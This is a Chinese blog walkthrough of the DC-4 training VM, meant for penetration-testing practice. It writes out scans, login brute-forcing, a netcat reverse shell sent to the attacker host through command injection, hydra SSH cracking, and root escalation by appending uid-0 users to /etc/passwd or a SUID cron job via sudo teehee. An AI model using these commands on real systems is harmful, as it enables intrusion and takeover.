DC-4靶机渗透测试

已于 2023-06-03 11:51:13 修改
阅读量766 收藏 8
点赞数 3
分类专栏: DC靶机系列 文章标签: web安全 服务器 linux
于 2023-04-18 19:22:29 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64297700/article/details/130187476
版权

DC-4

靶机所需环境

  • 目标靶机:DC-4(192.168.160.178)
  • 攻击机:Kali Linux(192.168.160.176)

信息收集

  • 还是常规的扫描一下存活主机叭,这次咱使用刚学到的新命令扫描下;
nmap -sP IP网段

在这里插入图片描述

  • 使用masscan扫描目标端口可以提高准确性

-p参数指定端口范围,--rate参数指定速度;

masscan 192.168.160.178 -p1-65535 --rate=100000

在这里插入图片描述

  • 访问靶机下的80端口,看到一个登录框;

在这里插入图片描述

  • 记住一般只要有登录框就会存在admin管理员,使用Burp爆破,由于过程比较久这里就不演示了哈😂,成功爆破出密码;
用户: admin
密码: happy
  • Command页面进行了下测试,发现这里存在一个命令执行;

在这里插入图片描述

漏洞利用

  • 尝试反弹shell,页面抓包;

在这里插入图片描述

  • kali监听端口1234,Burp修改命令执行反弹操作;
kali: nc -lvp 1234

nc+-e+/bin/bash+192.168.160.176+1234

在这里插入图片描述

  • 成功反弹至kali上,执行命令进行交互;
python -c "import pty;pty.spawn('/bin/bash')"

在这里插入图片描述

用户大比拼

  • 进入/home家目录寻找信息,发现jim用户里存在密码备份文件;

在这里插入图片描述

  • 复制密码保存为passwords.txt文件,kali新开个窗口使用hydra成功爆破出密码;
用户: jim	密码: jibril04	
//注: 密码那个是小写的l,不是数字1;

hydra -l jim -P passwords.txt ssh://192.168.160.178:22

在这里插入图片描述

  • 那就远程一下jim用户叭;
ssh jim@192.168.160.178

在这里插入图片描述

  • 瞎逛了一圈后发现个mail邮件,进入/var/mail目录下,查看邮件发现了charles用户的密码;(小插曲:这年头学个信安不会英语还真不行😭)
用户: charles
密码: ^xHhA&hvim0y

在这里插入图片描述

  • 尝试切换至charles用户不知道啥子原因被拒绝了,但执行su命令成功;

在这里插入图片描述

  • /home目录下没找到什么有用信息,看下sudo能执行命令或文件,发现有个teehee命令;

知识小拓展
teehee是个小众的linux编辑器,如果有sudo权限,可以利用其来提权;
核心思路就是利用其在passwd文件中追加一条uid为0的用户条目;

在这里插入图片描述

权限提升

方法一(添加用户/etc/passwd)

无密码版
  • 查看/etc/passwd密码文件,复制root信息;
root用户: root:x:0:0:root:/root:/bin/bash
//仿造一份hack用户的,记得删除x;
hack用户: hack::0:0:root:/root:/bin/bash

在这里插入图片描述

  • 使用teehee命令添加hack用户至密码文件;
echo "hack::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

在这里插入图片描述
在这里插入图片描述

  • 执行su命令成功提权至root

在这里插入图片描述

有密码版
  • 其实都差不多呢,使用perl命令生成密码,添加Joker用户至密码文件;
生成密码: perl -le 'print crypt("123456", "aa")'

echo "Joker:aaAN1ZUwjW7to:0:0:::/bin/bash" | sudo teehee -a /etc/pass
wd

在这里插入图片描述
在这里插入图片描述

  • 执行su命令输入密码123456成功提权至root

在这里插入图片描述

方法二(定时任务)

  • 通过执行的脚本给/bin/sh赋予SUID权限,这样就可以在非root用户下执行它,并且执行期间拥有root权限;
echo "* * * * * root chmod 4777 /bin/sh" | sudo teehee -a /etc/crontab

在这里插入图片描述
在这里插入图片描述

  • 查看权限发现成功写入了suid权限,执行/bin/sh成功提至root权限;

在这里插入图片描述
上一篇 > DC-3靶机渗透测试

下一篇 > DC-5靶机渗透测试

以上内容就是DC-4靶机渗透测试的全过程,如有还不太理解或有其他想法的小伙伴们都可以私信我或评论区打出来哟,如有写的不好的地方也请大家多多包涵一下,我也会慢慢去改进和提高的,请各位小伙伴多多支持,走之前别忘了点个赞哟😁!

以上内容仅供学习参考使用,切勿用于非法用途,切勿用于非法用途,切勿用于非法用途!!!重要的事情说三遍

橘猫的饼干798
关注
  • 3
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DC-4渗透靶机详解
weixin_51083551的博客
09-12 4076
萌新DC系列靶机渗透详解之 DC-4 “DC-3好难呜呜,先打DC-4” 1. 明确目标 获得靶机 root 权限,找到root账户下的 flag 2. 信息收集 使用 arp-scan 扫描网段下的主机 └─# arp-scan -l
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
靶机DC-4—WP
m0_66638011的博客
06-22 944
DC系列靶机是一系列专门为渗透测试和网络安全实验室设计的虚拟机器。这些靶机提供了一系列不同的漏洞和攻击场景,使渗透测试者可以在这些环境下测试自的技能和工具。DC系列靶机包含多个不同的主题,例如各种操作系统的漏洞,Web应用程序安全和无线网络安全等。它们对初学者和专业人士都有很大的价值,因为它们可以帮助他们了解安全漏洞和如何利用它们进行渗透测试DC-4靶场攻破过程:1.首先我们进行主机发现,将测试机的网站进行了指纹扫描,发现它没有任何框架。2.然后我们进行bp抓包,发现了暴力破解漏洞。
DC-4靶机渗透
weixin_45349299的博客
12-21 993
开放的端口:22 => ssh服务 ---- OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)80 => http服务 ---- nginx 1.15.10扫描出来的网站目录。
最新看完这篇 教你玩转渗透测试靶机vulnhub——DC4_vulnhub dc4,2024年最新你的技术真的到天花板了吗
最新发布
2401_84563354的博客
05-12 722
这是做的第五个靶场了,学习的知识点和一些细节就是 :1.需要注意的细节就是bp抓包的时候不要发送到repeater,那个send和Forward不一样 这里卡了很久一直报错,然后没有回弹shell。2.需要注意的还是python交互那个 容易打错,一定要细心在细心,我前面加了个python3就好3.把这个里面的复制到kali这样才方便爆破 好像下载不了只能复制(我比较菜就只能这样做了)4.还有个小失误就是 jim里面有个charles。
DC-4 靶机详解(两个解法版本)
TonyChaoWei的博客
04-11 898
DC-4 两钟解法
靶机5 DC-4(过程超详细)
honest_gg的博客
09-26 1584
DC靶场一共有9个,对于学习渗透测试人员,有很大的帮助,是非常不错的靶场。
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
DC-4-Web渗透测试靶机
01-19
DC-4-Web渗透测试靶机】是一个专门为网络安全专业人士设计的模拟环境,主要用于学习和实践Web渗透测试技术。在Web渗透测试中,目标是识别并利用网站应用程序的安全漏洞,以便于预防或修复这些漏洞,保护真实的网络...
DC-4靶场搭建及渗透实战详细过程(DC靶场系列)
金 帛的博客
07-28 4967
dc-4靶场详细渗透过程
linux window文件格式转linux文件格式
loyaltylzr的专栏
12-28 1402
(1)使用linux命令dos2unix filename,直接把文件转换为unix格式; (2)使用sed命令sed -i "s/\r//" filename 或者 sed -i "s/^M//" filename直接替换结尾符为unix格式; (3)vi filename打开文件,执行 : set ff=unix 设置文件为unix,然后执行:wq,保存成unix格式。 查看脚本文件是dos...
dc-4 靶机渗透学习
..
03-19 3058
信息收集 第一步还是老办法,探测主机存活。 nmap -sP 192.168.202.0/24 通过推断得出192.168.202.142是靶机,具体请看dc-2、dc-3,对靶机进行端口扫描。 nmap -A -p- -v 192.168.202.142 发现22、80端口开启,访问一下80端口,发现是个登录页面。 用Wappalyzer识别框架,没试别出,查看源代码发现只是一个简单的登录界面 这种情况感觉没必要再用nikto扫描了,尝试用bp爆...
DC-4靶机
mlws1900的博客
03-24 1007
下载不下来用迅雷下载。
渗透测试学习之靶机DC-4
xdbzdgx的博客
11-18 3684
1.下载靶机 本篇文章是DC靶机系列的第四篇,针对的是靶机DC-4,建议感兴趣的读者从DC-1开始练习,详细内容可以看我之前的文章。 DC-4的下载地址为DC: 5 ~ VulnHub。下载后解压为.ova文件,该格式可直接在VMware上打开,如果显示打开失败,点击重试即可成功,如果仍无法成功可百度、谷歌解决。 同样地,DC-4只有一个flag。 在VMware加载成功之后显示如下界面: 默认状态我们是打不开该系统的,也不知道账号密码的,毕竟我们的目的就是在不知道账号密码的情况下拿到ro
DC-4靶机详细渗透过程
MRS_jianai的博客
11-30 544
dc4靶机渗透教程
渗透DC-1靶机设计思路
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值